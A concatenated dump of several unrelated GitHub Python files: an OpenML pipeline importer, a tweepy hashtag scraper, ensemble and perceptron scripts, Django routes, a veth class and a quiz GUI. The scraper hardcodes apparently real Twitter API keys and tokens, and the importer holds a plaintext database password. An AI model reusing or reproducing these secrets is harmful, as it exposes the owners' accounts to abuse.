ds.qualities['NumberOfMissingValues'] > 100000 or X.shape[1] > 500000:\n return None, None, None\n dataset_conf = DatasetConfig({'openml': id, 'train_path': None})\n dataset_conf.format = ds.format\n dataset_conf.class_column = ds.default_target_attribute\n dataset_conf.name = '{}_{}_{}'.format(ds.name, int(eval(id)), time.time())\n return X, y, dataset_conf\n\n\ndef delete_hp(names: List[str], hp: Dict[str, Any]):\n for name in names:\n if name in hp:\n del hp[name]\n return hp\n\n\ndef convert_hp(types: List[Tuple[str, Callable]], hp: Dict[str, Any]):\n for name, func in types:\n if name in hp:\n hp[name] = func(hp[name])\n return hp\n\n\ndef init_component(hp):\n # (fixed) this helper previously read from a global 'hyperparameter' series instead of its own hp argument, which only worked while the caller's variable happened to be in scope\n hp = hp.replace('true', True)\n hp = hp.replace('false', False)\n for key in hp.keys():\n try:\n if isinstance(hp[key], str):\n hp[key] = float(hp[key])\n except (TypeError, ValueError):\n pass # non-numeric strings fall through to the bool checks below\n if hp[key] == 'True':\n hp[key] = True\n elif hp[key] == 'False':\n hp[key] = False\n return hp\n\n\ndef init_preprocessor(X, y, component, hp):\n hp = init_component(hp)\n hp = delete_hp(['copy', 'verbose', 'random_state', 'memory', 'cache_size'], hp)\n\n if component.name().endswith('ImputationComponent'):\n hp = delete_hp(['fill_value', 'missing_values'], hp)\n\n if component.name().endswith('PCAComponent'):\n if 'svd_solver' in hp and hp['svd_solver'] == 'auto':\n if max(*X.shape) > 500000:\n hp['svd_solver'] = 'full'\n del hp['iterated_power']\n else:\n hp['svd_solver'] = 'randomized'\n elif ('n_components' in hp and hp['n_components'] is None) or (\n 'n_components' in hp and hp['n_components'] == 'null') or (\n 'n_components' in hp and hp['n_components'] == 'None'):\n hp['keep_variance'] = 1.0\n if 'n_components' in hp and isinstance(hp['n_components'], float):\n hp['keep_variance'] = hp['n_components'] / min(*X.shape)\n if 'iterated_power' in hp and hp['iterated_power'] == 'auto':\n if 'keep_variance' in hp and hp['keep_variance'] < (0.1 * min(*X.shape)):\n hp['iterated_power'] = 4\n else:\n hp['iterated_power'] = 7\n hp = delete_hp(['n_components'], 
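hp) # (added) closes the original call; delete_hp is idempotent, so the reopened duplicate below is harmless\n # (added note) absolute n_components values were converted above into a keep_variance fraction of min(n_samples, n_features), so the raw key is dropped here.\n hp = delete_hp(['n_components'], 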
hp)\n\n if component.name().endswith('BinarizerComponent'):\n if 'threshold' in hp:\n hp['threshold_factor'] = hp['threshold'] / np.mean(X.var())\n del hp['threshold']\n\n if component.name().endswith('SelectKBestComponent'):\n if 'k' in hp:\n hp['k_factor'] = hp['k'] / X.shape[1]\n del hp['k']\n if 'score_func' in hp and 'f_regression' in hp['score_func']:\n hp['score_func'] = 'f_regression'\n if 'score_func' in hp and 'f_classif' in hp['score_func']:\n hp['score_func'] = 'f_classif'\n if 'score_func' in hp and 'mutual_info' in hp['score_func']:\n hp['score_func'] = 'mutual_info'\n if 'score_func' in hp and 'chi2' in hp['score_func']:\n hp['score_func'] = 'chi2'\n\n if component.name().endswith('FeatureAgglomerationComponent'):\n if 'compute_full_tree' in hp and hp['compute_full_tree'] == 'auto':\n hp['compute_full_tree'] = False\n if 'pooling_func' in hp and 'mean' in hp['pooling_func']:\n hp['pooling_func'] = 'mean'\n if 'pooling_func' in hp and 'median' in hp['pooling_func']:\n hp['pooling_func'] = 'median'\n if 'pooling_func' in hp and 'max' in hp['pooling_func']:\n hp['pooling_func'] = 'max'\n if 'n_clusters' in hp:\n hp['n_clusters_factor'] = hp['n_clusters'] / X.shape[1]\n hp = delete_hp(['connectivity', 'n_clusters'], hp)\n\n if component.name().endswith('OneHotEncoderComponent'):\n return algorithm.get_hyperparameter_search_space().get_default_configuration()\n\n cs = algorithm.get_hyperparameter_search_space()\n default = cs.get_default_configuration()\n default = default.get_dictionary()\n for key in hp.keys():\n try:\n if isinstance(hp[key], str):\n default[key] = float(hp[key])\n else:\n default[key] = hp[key]\n except:\n default[key] = hp[key]\n\n default = convert_hp([\n ('max_bins', int),\n ('with_mean', bool),\n ('with_std', bool),\n ('whiten', bool),\n ('add_indicator', bool),\n ('probability', bool),\n ('degree', int),\n ('iterated_power', int)\n ], default)\n\n if 'iterated_power' in default and 'solver' in default and default['solver'] != 'randomized':\n del default['iterated_power']\n if 'distance_threshold' in default and 'distance_threshold' not in hp:\n del default['distance_threshold']\n config = None\n try:\n config = Configuration(cs, default)\n except ValueError as v:\n print(v)\n\n return config\n\n\ndef init_classifier(X, y, component, hp):\n hp = init_component(hp)\n\n if component.name().endswith('RandomForest') or component.name().endswith(\n 'ExtraTreesClassifier') or component.name().endswith('DecisionTree'):\n if 'n_estimators' in hp and hp['n_estimators'] == 'warn':\n hp['n_estimators'] = 10\n elif 'max_depth' in hp and hp['max_depth'] is not None and not isinstance(hp['max_depth'], str):\n hp['max_depth_factor'] = (hp['max_depth'] / X.shape[1])\n if 'max_leaf_nodes' in hp and hp['max_leaf_nodes'] is not None and not isinstance(hp['max_leaf_nodes'], str):\n hp['max_leaf_nodes_factor'] = (hp['max_leaf_nodes'] / X.shape[0])\n if 'min_samples_leaf' in hp and hp['min_samples_leaf'] is not None and not isinstance(hp['min_samples_leaf'],str):\n hp['min_samples_leaf'] = (hp['min_samples_leaf'] / X.shape[0])\n if 'max_features' in hp and hp['max_features'] == 'null' or np.isnan(hp['max_features']):\n hp['max_features'] = 1.0\n if 'max_features' in hp and hp['max_features'] is not None and not isinstance(hp['max_features'], str):\n hp['max_features'] = (hp['max_features'] / X.shape[1])\n if component.name().endswith('ExtraTreesClassifier') and 'oob_score' in hp:\n del hp['oob_score']\n elif 'max_features' in hp and hp['max_features'] is not None and 
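False:\n pass # (added) inert branch; anchors the notes below\n # (added note) the string sentinels 'auto', 'sqrt' and 'log2' are rewritten below as the equivalent fraction of X.shape[1], so stored max_features values end up numeric.\n # (added note) in the 'null' check above, and binds tighter than or, so np.isnan(hp['max_features']) can run when the key is absent; parenthesizing the or branch is the intended reading.\n elif 'max_features' in hp and hp['max_features'] is not None and 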
isinstance(hp['max_features'], str):\n if hp['max_features'] == 'auto' or hp['max_features'] == 'sqrt':\n hp['max_features'] = np.sqrt(X.shape[1]) / X.shape[1]\n elif hp['max_features'] == 'log2':\n hp['max_features'] = np.log2(X.shape[1]) / X.shape[1]\n if 'min_samples_split' in hp and hp['min_samples_split'] is not None and not isinstance(hp['min_samples_split'],\n str):\n hp['min_samples_split'] = (hp['min_samples_split'] / X.shape[0])\n if 'min_impurity_split' in hp:\n del hp['min_impurity_split']\n if 'presort' in hp:\n del hp['presort']\n if 'min_impurity_split' in hp:\n del hp['min_impurity_split']\n\n if component.name().endswith('GradientBoostingClassifier'):\n if 'max_leaf_nodes' in hp and hp['max_leaf_nodes'] is not None and not isinstance(hp['max_leaf_nodes'], str):\n hp['max_leaf_nodes_factor'] = (hp['max_leaf_nodes'] / X.shape[0])\n if 'max_depth' in hp and hp['max_depth'] is not None and not isinstance(hp['max_depth'], str):\n hp['max_depth_factor'] = (hp['max_depth'] / X.shape[1])\n del hp['max_depth']\n if 'min_samples_leaf' in hp and hp['min_samples_leaf'] is not None and not isinstance(hp['min_samples_leaf'], str):\n hp['min_samples_leaf'] = (hp['min_samples_leaf'] / X.shape[0])\n if 'max_bins' in hp and hp['max_bins'] == 256:\n hp['max_bins'] = 255\n if 'scoring' in hp and hp['scoring'] == 'null':\n hp['scoring'] = 'accuracy'\n if 'n_iter_no_change' in hp and hp['n_iter_no_change'] == 'null':\n hp['n_iter_no_change'] = 0\n\n if component.name().endswith('LibSVM_SVC'):\n if 'max_iter' in hp:\n del hp['max_iter']\n if 'gamma' in hp and isinstance(hp['gamma'], str) and hp['gamma'] == 'auto':\n hp['gamma'] = 1 / X.shape[1]\n if 'gamma' in hp and isinstance(hp['gamma'], str) and hp['gamma'] == 'scale':\n hp['gamma'] = 1 / (X.shape[1] * np.mean(X.var()))\n if 'decision_function_shape' in hp and hp['decision_function_shape'] is None:\n hp['decision_function_shape'] = 'ovo'\n if 'decision_function_shape' in hp and hp['decision_function_shape'] is 'None':\n hp['decision_function_shape'] = 'ovo'\n if 'kernel' in hp and hp['kernel'] == 'poly':\n if 'coef0' not in hp:\n hp['coef0'] = 0.\n if 'degree' not in hp:\n hp['degree'] = 2\n if 'gamma' not in hp:\n hp['gamma'] = 0.1\n if 'kernel' in hp and hp['kernel'] == 'sigmoid':\n if 'coef0' not in hp:\n hp['coef0'] = 0.\n if 'gamma' not in hp:\n hp['gamma'] = 0.1\n if 'kernel' in hp and hp['kernel'] == 'rbf':\n if 'gamma' not in hp:\n hp['gamma'] = 0.1\n\n if component.name().endswith('MultinomialNB') or component.name().endswith('BernoulliNB'):\n if 'class_prior' in hp:\n del hp['class_prior']\n if 'binarize' in hp:\n del hp['binarize']\n\n if component.name().endswith('SGDClassifier'):\n if 'n_iter_no_change' in hp:\n del hp['n_iter_no_change']\n\n if component.name().endswith('LinearDiscriminantAnalysis'):\n if 'n_components' in hp and np.isnan(hp['n_components']):\n hp['n_components'] = min(len(y.unique()) - 1, X.shape[1])\n if 'shrinkage' in hp and np.isnan(hp['shrinkage']):\n hp['shrinkage'] = 0.0\n if 'priors' in hp:\n del hp['priors']\n if 'store_covariance' in hp:\n del hp['store_covariance']\n\n if component.name().endswith('GaussianNB'):\n if 'priors' in hp:\n del hp['priors']\n\n if component.name().endswith('LogisticRegression'):\n if 'multi_class' in hp and hp['multi_class'] == 'auto':\n if len(y.unique()) == 2 or hp['solver'] == 'liblinear':\n hp['multi_class'] = 'ovr'\n else:\n hp['multi_class'] = 'multinomial'\n elif 'multi_class' in hp and hp['multi_class'] == 'warn':\n hp['multi_class'] = 'ovr'\n if 'solver' in hp and 
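False:\n pass # (added) inert branch; anchors the notes below\n # (added note) sklearn 0.20's 'warn' sentinels are resolved to the old defaults ('ovr', 'liblinear') so recorded runs replay.\n # (added note) two nearby smells: the LibSVM branch above tests decision_function_shape with is 'None' (== is the intended comparison), and the MLP branch below reads hidden_layer_sizes[1] for both layer_1_size and layer_2_size (the first likely means [0]).\n if 'solver' in hp and 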
hp['solver'] == 'warn':\n hp['solver'] = 'liblinear'\n if 'l1_ratio' in hp and 'penalty' in hp and hp['penalty'] != 'elasticnet':\n del hp['l1_ratio']\n\n if component.name().endswith('MLPClassifier'):\n if 'batch_size' in hp:\n del hp['batch_size']\n if 'hidden_layer_sizes' in hp:\n hp['layer_1_size'] = hp['hidden_layer_sizes'][1]\n hp['layer_2_size'] = hp['hidden_layer_sizes'][1]\n del hp['hidden_layer_sizes']\n\n if component.name().endswith('QuadraticDiscriminantAnalysis'):\n if 'store_covariances' in hp:\n del hp['store_covariances']\n if 'priors' in hp:\n del hp['priors']\n\n if component.name().endswith('KNeighborsClassifier'):\n if 'metric_params' in hp:\n del hp['metric_params']\n\n hp = delete_hp(['copy', 'verbose', 'random_state', 'memory', 'cache_size', 'max_depth', 'max_leaf_nodes', 'n_jobs',\n 'warm_start', 'class_weight'], hp)\n\n cs = algorithm.get_hyperparameter_search_space()\n default = cs.get_default_configuration()\n default = default.get_dictionary()\n for key in hp.keys():\n try:\n if isinstance(hp[key], str):\n default[key] = float(hp[key])\n else:\n default[key] = hp[key]\n except:\n default[key] = hp[key]\n if 'bootstrap' in default and 'oob_score' in default and default['bootstrap'] is False:\n del default['oob_score']\n if 'degree' in default and 'kernel' in default and default['kernel'] != 'poly':\n del default['degree']\n if 'coef0' in default and 'kernel' in default and default['kernel'] not in ['poly', 'sigmoid']:\n del default['coef0']\n if 'gamma' in default and 'kernel' in default and default['kernel'] not in ['poly', 'sigmoid', 'rbf']:\n del default['gamma']\n if 'shrinkage' in default and 'solver' in default and default['solver'] not in [\"lsqr\", \"eigen\"]:\n del default['shrinkage']\n if 'dual' in default and 'penalty' in default and default['penalty'] != 'l2' and 'solver' in default and default['solver'] != 'liblinear':\n del default['dual']\n if 'dual' in default and 'solver' in default and default['solver'] != 'liblinear':\n del default['dual']\n if 'learning_rate_init' in default and 'solver' in default and default['solver'] not in [\"sgd\", \"adam\"]:\n del default['learning_rate_init']\n if 'power_t' in default and 'solver' in default and default['solver'] not in [\"sgd\"]:\n del default['power_t']\n if 'power_t' in default and 'learning_rate' in default and default['learning_rate'] not in [\"invscaling\"]:\n del default['power_t']\n if 'momentum' in default and 'solver' in default and default['solver'] not in [\"sgd\"]:\n del default['momentum']\n if 'nesterovs_momentum' in default and 'momentum' in default and default['momentum'] != 0.0:\n del default['nesterovs_momentum']\n if 'nesterovs_momentum' in default and 'solver' in default and default['solver'] != 'sgd':\n del default['nesterovs_momentum']\n if 'early_stopping' in default and 'solver' in default and default['solver'] not in [\"sgd\", \"adam\"]:\n del default['early_stopping']\n if 'validation_fraction' in default and 'early_stopping' in default and default['early_stopping'] is True:\n del default['validation_fraction']\n if 'beta_1' in default and 'solver' in default and default['solver'] not in [\"adam\"]:\n del default['beta_1']\n if 'beta_2' in default and 'solver' in default and default['solver'] not in [\"adam\"]:\n del default['beta_2']\n if 'epsilon' in default and 'solver' in default and default['solver'] not in [\"adam\"]:\n del default['epsilon']\n if 'n_iter_no_change' in default and 'solver' in default and default['solver'] not in [\"sgd\", \"adam\"]:\n del 
default['n_iter_no_change']\n\n default = convert_hp([('max_iter', int),\n ('n_estimators', int),\n ('leaf_size', int),\n ('layer_1_size', int),\n ('layer_2_size', int),\n ('max_bins', int),\n ('n_neighbors', int),\n ('probability', bool),\n ('fit_intercept', bool),\n ('shrinking', bool),\n ('shuffle', bool),\n ('dual', bool),\n ('add_indicator', bool),\n ('bootstrap', bool),\n ('early_stopping', bool),\n ('oob_score', bool),\n ('degree', int),\n ('p', int)\n ], default)\n return Configuration(cs, default)\n\n\ncore = Core(work_dir='data/')\ndatabase = Database('sqlite', 'assets/ml-base.db', None, None, None, None, None)\nengine = create_engine('postgresql://admin:admin123@127.0.0.1:5432/openml_data')\ndaten = pd.read_sql(sql='''select * from data where \"0.name\" = 'sklearn.impute._base.SimpleImputer';''', con=engine)\nfor index, pipeline in daten.iterrows():\n length = 0\n step = '{}.name'.format(length)\n abort = False\n while step in pipeline and pipeline[step] is not None:\n if pipeline[step] not in mapping.keys():\n abort = True\n break\n length += 1\n step = '{}.name'.format(length)\n\n if abort:\n print('Unknown algorithm {}'.format(pipeline[step]))\n continue\n\n try:\n dataset = pipeline['dataset']\n X, y, dataset_conf = get_dataset(dataset)\n if dataset_conf is None:\n continue\n df = pd.concat([X, y], axis=1)\n dataset_id = core.add_dataset(df, dataset_conf.class_column, depth=0, name=dataset_conf.name).id\n except Exception as e:\n print(e)\n dataset = -1\n continue\n\n created_ids = []\n for step in range(length):\n try:\n algorithm_name = mapping[pipeline[str(step) + '.name']]\n algorithm = ALGORITHMS[algorithm_name]()\n hyperparameter = pd.Series(eval(pipeline[str(step) + '.hyperparameter']))\n if is_classifier(algorithm):\n config = init_classifier(X, y, algorithm, hyperparameter)\n else:\n config = init_preprocessor(X, y, algorithm, hyperparameter)\n\n algorithm_id = database.create_algorithm(dataset_id,\n Algorithm(algorithm_name, input_dataset=dataset_id,\n status=AlgorithmStatus.COMPLETE,\n output_dataset=None,\n start_time=datetime.now(), end_time=datetime.now(),\n hyperparameter_values=config, host='openML')).id\n created_ids.append(str(algorithm_id))\n\n if is_classifier(algorithm):\n database.complete_algorithm(algorithm_id, None,\n accuracy=pipeline['predictive_accuracy'],\n f1=pipeline['f_measure'],\n precision=pipeline['precision'],\n roc_auc=pipeline['area_under_roc_curve'],\n recall=pipeline['weighted_recall'])\n # TODO check if classifier can be in middle of pipeline\n if step != length - 1:\n raise ValueError('Detected classifier in the middle of the pipeline')\n\n else:\n if hasattr(algorithm, 'fit_transform'):\n X = algorithm.fit_transform(pd.DataFrame(X), pd.Series(y))\n else:\n X = algorithm.fit(pd.DataFrame(X), pd.Series(y)).transform(pd.DataFrame(X))\n X = pd.DataFrame(data=X, index=range(X.shape[0]), columns=range(X.shape[1]))\n df = pd.concat([X, y], axis=1)\n dataset_id = core.add_dataset(df, dataset_conf.class_column, depth=0, budget=0).id\n database.complete_algorithm(algorithm_id, dataset_id)\n except Exception as e:\n print('{}: {}'.format(pipeline['index'], e))\n print('deleting ids: ' + str(created_ids))\n db_url = URL(drivername='sqlite', database='assets/ml-base.db', username=None, password=None, host=None,\n port=None, query=None)\n engine_to_delete = create_engine(db_url, pool_pre_ping=True, pool_recycle=3600,\n connect_args={\"check_same_thread\": False})\n engine_to_delete.execute(\n 'delete from main.algorithms where main.algorithms.id 
in ({})'.format(', '.join(created_ids)))\n engine_to_delete.dispose()\n break\n","repo_name":"Ennosigaeon/meta-learning-base","sub_path":"scripts/openml_transformer.py","file_name":"openml_transformer.py","file_ext":"py","file_size_in_byte":23199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18067690068","text":"import tweepy\nimport csv\nimport pandas as pd\nimport sys\n\n####input your credentials here\nconsumer_key = '32kPBCxkpRdjftbA2aNIPz41b'\nconsumer_secret = 'YmfYen0Brw8FvUQMHZwNAfFXfopgTECti7nsq42KDXmIKzCxvg'\naccess_token = '748180615669891072-ofAuXoBlstCSlmMbYhtobGLNXfLchY4'\naccess_token_secret = 'qiyq0WzOjuG8tuhGggaF2tr3dLhfUYkJ0LJHs2zF54C4u'\n\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\n\ndef collect_tweets(hastag):\n csv_file = open('./collected_tweets/{}.csv'.format(hastag), 'a')\n csv_writer = csv.writer(csv_file)\n\n num_collected = 0\n for tweet in tweepy.Cursor(api.search,q=\"#{}\".format(hastag),count=200,lang=\"en\").items():\n # print(tweet.created_at, tweet.text)\n csv_writer.writerow([tweet.created_at, tweet.text.encode('utf-8')])\n num_collected = num_collected + 1\n print(num_collected)\n\nhastag = sys.argv[1]\ncollect_tweets(\"{}\".format(hastag))","repo_name":"Prashant047/info-diffusion-in-social-net","sub_path":"tweet_extractor_hastag.py","file_name":"tweet_extractor_hastag.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75120189904","text":"#!usr/bin/python\n\n\nfrom utils import deck_parser as dp\nfrom datetime import datetime\nimport utils.utilities as u\nimport sys\nimport os\nfrom tqdm import tqdm\n\nfrom pathlib import Path\n\nSTORAGE_DIR = './simulations/storage/'\nSTUDIES_DIR = './simulations/studies/'\nPath(STORAGE_DIR).mkdir(parents=True, exist_ok=True)\nPath(STUDIES_DIR).mkdir(parents=True, exist_ok=True)\n\ndef mutate_case(root_datafile_path, real_datafile_path, parameters, case_number):\n\n with open(root_datafile_path, 'r') as file :\n filedata = file.read()\n\n # parameters\n for param in tqdm(parameters, total=len(parameters), leave=True, desc=\"Populating properties: \"):\n \n Name = param[\"Name\"]\n Type = param[\"Type\"]\n d = param[\"Distribution\"]\n \n if Type == \"SingleValue\":\n replaced_value = u.replace_single_value(d)\n elif Type == \"RandomField\":\n replaced_value = u.replace_random_field(d)\n elif Type == \"FixedFile\":\n replaced_value = u.replace_fixed_value(d, case_number)\n else:\n raise NotImplementedError(f\"Distribution type {Type} is not recognized.\")\n \n filedata = filedata.replace(Name, replaced_value)\n\n # Write the file out again\n with open(real_datafile_path, 'w') as file:\n file.write(filedata)\n\n\ndef mutate_cases(data, root_datafile_path):\n\n _, tail = os.path.split(root_datafile_path) # dir_path = /path/to/data\n root_name = os.path.splitext(tail)[0] #root_name = SPE1\n\n base_ens_path = os.path.join(STORAGE_DIR, 'BASE_' + data['Name'])\n Path(base_ens_path).mkdir(parents=True, exist_ok=True)\n\n real_files = {}\n for i in tqdm(range(1, data['Ne']+1), total=data['Ne'], desc=\"Case: \"):\n real_name = root_name + '_%s'%i # SPE1_i\n \n real_path = os.path.join(base_ens_path, real_name) # /path/to/data/SPE1_i\n Path(real_path).mkdir(parents=True, exist_ok=True)\n\n real_datafile_path = os.path.join(real_path, real_name + '.DATA') # 
/path/to/data/SPE1_i/SPE1_i.DATA\n \n mutate_case(root_datafile_path, real_datafile_path, data['parameters'], i)\n\n real_files[real_name] = real_datafile_path\n\n return real_files\n\ndef dump_ensemble(data, real_files, root_datafile_path, json_path):\n\n ensemble_study = os.path.join(STUDIES_DIR, '%s.json' %data['Name'])\n\n # current date and time\n now = datetime.now()\n\n timestamp = datetime.timestamp(now)\n dt_object = str(datetime.fromtimestamp(timestamp))\n\n ens_path = os.path.join(STORAGE_DIR, 'BASE_' + data['Name'])\n \n study = {'status':\"created\",\n 'Name': data['Name'],\n 'creation': {\n 'root': root_datafile_path,\n 'json': json_path,\n 'timestamp': dt_object,\n 'base_realizations': real_files,\n 'storage': ens_path} \n }\n \n u.save_to_json(ensemble_study, study)\n\ndef main(argv):\n\n # root_datafile_path = argv[0] # root_path to the data file e.g. /path/to/data/SPE1.DATA\n json_path = argv[0] # path to the json file e.g. /path/to/json/SPE1.json\n \n if not os.path.isfile(json_path):\n raise ValueError(\"%s cannot be found\" %json_path)\n \n config = u.read_json(json_path)\n \n root_datafile_path = config[\"root\"]\n if not os.path.isfile(root_datafile_path):\n raise ValueError(\"%s cannot be found\" %root_datafile_path)\n\n data = u.read_json(json_path)\n real_files = mutate_cases(data, root_datafile_path)\n\n dump_ensemble(data, real_files, root_datafile_path, json_path)\n \nif __name__ == \"__main__\":\n \"\"\"The arguments are the following:\n 1. json path (str): path to the .json file that explains the uncertainties in the model \n \n Ex: \"python3 src/create_ensemble.py data/SPE1_Ensemble/SPE1_Poro.json\"\n \"\"\"\n\n main(sys.argv[1:])","repo_name":"iffanh/petlab","sub_path":"src/create_ensemble.py","file_name":"create_ensemble.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2393584683","text":"#-------------------------------------------------------------------------\n# AUTHOR: Irfan Iqbal\n# FILENAME: perception\n# SPECIFICATION: training a perceptron with differnt learning rates to find the best one\n# FOR: CS 4210- Assignment #4\n# TIME SPENT: 20 min\n#-----------------------------------------------------------*/\n\n#IMPORTANT NOTE: YOU HAVE TO WORK WITH THE PYTHON LIBRARIES numpy AND pandas to complete this code.\n\n#importing some Python libraries\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.neural_network import MLPClassifier #pip install scikit-learn==0.18.rc2 if needed\nimport numpy as np\nimport pandas as pd\n\nn = [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1.0]\nr = [True, False]\n\ndf = pd.read_csv('optdigits.tra', sep=',', header=None) #reading the data by using Pandas library\n\nX_training = np.array(df.values)[:,:64] #getting the first 64 fields to form the feature data for training\ny_training = np.array(df.values)[:,-1] #getting the last field to form the class label for training\n\ndf = pd.read_csv('optdigits.tes', sep=',', header=None) #reading the data by using Pandas library\n\nX_test = np.array(df.values)[:,:64] #getting the first 64 fields to form the feature data for test\ny_test = np.array(df.values)[:,-1] #getting the last field to form the class label for test\n\nmaxP,maxMLP=0,0\n\nfor i in n: #iterates over n\n\n for j in r: #iterates over r\n\n #iterates over both algorithms\n #-->add your Pyhton code here\n alg=[Perceptron, MLPClassifier]\n\n for a in alg: #iterates over the algorithms\n\n #Create a 
Neural Network classifier\n #if Perceptron then\n # clf = Perceptron() #use those hyperparameters: eta0 = learning rate, shuffle = shuffle the training data, max_iter=1000\n #else:\n # clf = MLPClassifier() #use those hyperparameters: activation='logistic', learning_rate_init = learning rate, hidden_layer_sizes = number of neurons in the ith hidden layer,\n # shuffle = shuffle the training data, max_iter=1000\n #-->add your Python code here\n\n if a==Perceptron:\n clf=Perceptron(eta0=i,shuffle=j,max_iter=1000)\n else:\n clf=MLPClassifier(activation='logistic',learning_rate_init=i,hidden_layer_sizes=100,shuffle=j,max_iter=1000)\n\n #Fit the Neural Network to the training data\n clf.fit(X_training, y_training)\n\n #make the classifier prediction for each test sample and start computing its accuracy\n #hint: to iterate over two collections simultaneously with zip() Example:\n #for (x_testSample, y_testSample) in zip(X_test, y_test):\n #to make a prediction do: clf.predict([x_testSample])\n #--> add your Python code here\n accuracy=0\n for (X_testSample,y_testSample) in zip(X_test,y_test):\n if clf.predict([X_testSample])==y_testSample:\n accuracy+=1\n accuracy/=len(X_test)\n\n #check if the calculated accuracy is higher than the previously one calculated for each classifier. If so, update the highest accuracy\n #and print it together with the network hyperparameters\n #Example: \"Highest Perceptron accuracy so far: 0.88, Parameters: learning rate=0.01, shuffle=True\"\n #Example: \"Highest MLP accuracy so far: 0.90, Parameters: learning rate=0.02, shuffle=False\"\n #--> add your Python code here\n\n if a==Perceptron and accuracy>maxP:\n maxP=accuracy\n print(\"Highest Perceptron accuracy so far: \"+ str(round(accuracy,3))+\" Parameters: learning rate=\"+str(i)+\", shuffle=\"+str(j))\n\n elif accuracy > maxMLP:\n maxMLP = accuracy\n print(\"Highest MLP accuracy so far: \" + str(round(accuracy, 3)) + \" Parameters: learning rate=\" + str(i) + \", shuffle=\" + str(j))\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"irfan61802/CS-4210-Assignment-4","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39273565319","text":"from django.urls import path\nfrom frontend import views\n\napp_name = 'frontend'\n\nurlpatterns = [\n path('about-page/', views.about, name='about'),\n path('phones-page/', views.phones, name='phones'),\n path('laptops-page/', views.laptops, name='laptops'),\n path('shirts-page/', views.shirts, name='shirts'),\n path('screens-page/', views.screens, name='screens'),\n path('contact-page/', views.contact, name='contact'),\n]\n","repo_name":"Tijae007/EcommerceMockup","sub_path":"frontend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"41895648343","text":"from .netdev import NetDev\nfrom .topology import TopologyMember\n\n\nclass Veth(TopologyMember):\n REF = 'veth'\n DESC = {'title': 'Virtual Ethernet (Veth) with IPv4 addresses'}\n SCHEMA = {\n 'type': 'object',\n 'additionalProperties': False,\n 'required': ['name', 'dev1', 'dev2'],\n 'properties': {\n 'name': {'type': 'string'},\n 'dev1': NetDev.SCHEMA,\n 'dev2': NetDev.SCHEMA\n }\n }\n\n def __init__(self, topology, name, ns1, ns2, dev1_args=None,\n dev2_args=None):\n super().__init__(topology, name)\n dev1_args = dev1_args or {}\n dev2_args = dev2_args or {}\n 
self.dev1 = NetDev(topology=topology, alias=f'{name}.dev1',\n owner=self, ns=ns1, **dev1_args)\n self.dev2 = NetDev(topology=topology, alias=f'{name}.dev2',\n owner=self, ns=ns2, **dev2_args)\n NetDev.set_peers(self.dev1, self.dev2)\n key = f'{self.REF}.{self.name}'\n self.topology.members[f'{key}.dev1'] = self.dev1\n self.topology.members[f'{key}.dev2'] = self.dev2\n self.topology.add_l2_conn(self.dev1, self.dev2)\n\n @classmethod\n def from_params(cls, topology, params):\n d1 = params['dev1']\n d2 = params['dev2']\n\n ns1 = topology.members[d1['netns']]\n ns2 = topology.members[d2['netns']]\n\n d1_args = NetDev.args_from_params(topology, d1)\n d2_args = NetDev.args_from_params(topology, d2)\n\n return cls(topology, params['name'], ns1, ns2,\n dev1_args=d1_args, dev2_args=d2_args)\n\n def render_bash(self):\n self.p(f'ip link add '\n f'{self.dev1.name} netns {self.dev1.ns.name} '\n f'type veth peer name '\n f'{self.dev2.name} netns {self.dev2.ns.name}')\n self.dev1.render_bash()\n self.dev2.render_bash()\n\n def render_dot(self):\n self.p(f'{self.dev1.dotname} -- {self.dev2.dotname}')\n","repo_name":"ebirger/netpen","sub_path":"netpen/veth.py","file_name":"veth.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"74429130385","text":"import tkinter as tk\nimport PIL.ImageTk, PIL.Image\n\nfrom quizgame import basequizgen\nfrom .basequizgen import basequizgen\nfrom .question import question\n\nclass GuessingGame(tk.Frame):\n def __init__(self, parent, quizgen, *args, **kwargs):\n super().__init__(parent, width=400, height=400, *args, **kwargs)\n\n if not isinstance(quizgen, basequizgen):\n raise Exception(\"No proper Quiz Generator given\")\n self.quizgen = quizgen\n\n self.tkimage = None\n\n self.active_qst = None\n\n self.answer_frame = tk.Frame(self)\n\n # configure string vars and labels\n self.questiontext = tk.StringVar()\n\n self.family_input = tk.StringVar()\n self.plantname_input = tk.StringVar()\n\n self.var_correct = tk.StringVar()\n self.var_wrong = tk.StringVar()\n\n self.correct_answer = tk.StringVar()\n\n self.var_correct.set(\"Correct: 0\")\n self.var_wrong.set(\"Missed: 0\")\n\n self.correct_answer.set(\"\")\n\n self.photolabel = tk.Label(self, relief=\"raised\")\n self.questionlabel = tk.Label(self, textvariable=self.questiontext, relief=\"raised\")\n\n self.family_entry = tk.Entry(self.answer_frame, textvariable=self.family_input)\n self.plantname_entry = tk.Entry(self.answer_frame, textvariable=self.plantname_input)\n\n self.family_label = tk.Label(self.answer_frame, text=\"Familie\")\n self.plantname_label = tk.Label(self.answer_frame, text=\"Pflanzenname\")\n\n self.correct_answer_label = tk.Label(self.answer_frame, textvariable=self.correct_answer)\n\n self.check_button = tk.Button(self.answer_frame, text=\"Check answer\", command=self.check_answer)\n self.next_button = tk.Button(self.answer_frame, text=\"Next Question\", command=self.show_question)\n\n # show number of wrong / correct attempts\n self.num_correct = 0\n self.num_missed = 0\n\n self.rateframe = tk.Frame(self)\n\n self.correct_label = tk.Label(self.rateframe, textvariable=self.var_correct)\n self.wrong_label = tk.Label(self.rateframe, 